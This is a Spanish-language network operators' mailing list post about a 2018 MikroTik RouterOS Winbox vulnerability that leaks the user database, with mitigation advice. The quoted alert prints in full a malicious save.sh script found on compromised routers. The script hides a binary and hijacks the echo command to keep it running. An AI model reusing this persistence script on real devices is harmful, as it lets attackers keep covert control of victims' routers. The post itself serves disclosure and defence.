[Lista ArNOG] Alerta seguridad Mikrotik

Carriers carriers en dainus.net
Mar Abr 24 07:06:07 ART 2018


Estimados  ojo  con esa versión  yo tube un par de problemas  se me iban los ping altisimos . al parecer hay  cambios en el enrutamiento

⁣​

En 24 de abril de 2018 06:46, en 06:46, Juan Pablo Orsi <juanpablo en internetlocal.com.ar> escribió:
>En el día de hoy MikroTik <http://mikrotik.com/> ha publicado un alerta
>de
>seguridad
><https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255>
>sobre
>una vulnerabilidad en el RouterOS que afecta a todas las versiones
>desde la
>v6.29.
>
>Según el alerta, indica que la vulnerabilidad ha sido descubierta por
>ellos
>mismos y que recomiendan actualizar ASAP (lo mas pronto posible).
>
>La vulnerabilidad permite a una “*herramienta especial*” conectar al
>puerto
>del Winbox y poder solicitar la base de datos de los usuarios del
>sistema.
>
>Para tomar una medida al respecto se recomienda:
>
>- Actualizar a la v6.42.1 y v6.43rc4 *Con precaución(leer mas adelante)
>- Cerrar el puerto del Winbox para el acceso publicomediante un
>*address
>   list* y el *firewall* en el chain *input*
>   - Limitar el rango de IP permitidos en *ip > service > winbox* a las
>   redes locales unicamente.
>   - Cambiar las contraseñas de los usuarios.
>
>Es importante tener en cuentaque en las recientes versiones del
>RouterOS existe
>un nuevo esquema en el manejo del bridge, porque lo hay que tener
>ciertas
>precauciones al actualizar debido a que se han dado casos de
>actualizaciones fallidas en configuraciones que tienen bridge y
>utilizan el
>chip switch.
>
>En caso de equipos que se encuentren en  producción y no es posible
>actualizar rápidamente el sistema operativo, es mandatorio que se
>cierre el
>acceso del winbox y cambiar las contraseñas de los usuarios.
>
>Por el momento no es posible conocer o detectar que el sistema ha sido
>vulnerado, por lo que también se recomienda aplicar el punto anterior.
>
>https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255
>ACTUALIZACION:
>
>Algunos usuarios están reportan que detectan dos archivos dentro de
>*files* con
>el nombre de *dnstest* con contenido binario y *save.sh* con el
>siguiente
>contenido:
>
>#!/bin/ash
>case "$PATH" in
>*/usr/local/bin*)
># old versions
>dest="/usr/local/bin/"
>;;
>*)
>dest="/flash/bin/"
>if [ ! -d "/flash/" ]; then
>exit 1
>fi
>;;
>esac
>
>if [ -f $dest/.dnstest ]; then
>rm $dest/.dnstest
>fi
>if [ -f $dest/echo ]; then
>rm $dest/echo
>fi
>if [ -f $dest/.test ]; then
>rm $dest/.test
>fi
>
>mkdir -p $dest
>
>export PATH=$PATH:$dest
>chmod a+x /flash/rw/pckg/dnstest
>cp /flash/rw/pckg/dnstest $dest/.dnstest
>
>echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest
>/tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
>chmod +x $dest/.test
>
>echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
>chmod +x $dest/echo
>/flash/rw/pckg/dnstest
>rm save.sh
>
>El intento tiene el siguiente comportamiento:
>
>Como se observa en la siguiente captura, el primer acceso es un intento
>fallido del winbox, por lo que se presume que tiene el acceso a la DB
>de
>usuarios. Luego el acceso es con el usuario con permisos *full.*
>
>[image: Comportamiento de Acceso]
>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Lista mailing list
>Lista en arnog.com.ar
>http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://mailmancabase.interdotnet.com.ar/pipermail/lista/attachments/20180424/5e0c20e9/attachment.html>


Más información sobre la lista de distribución Lista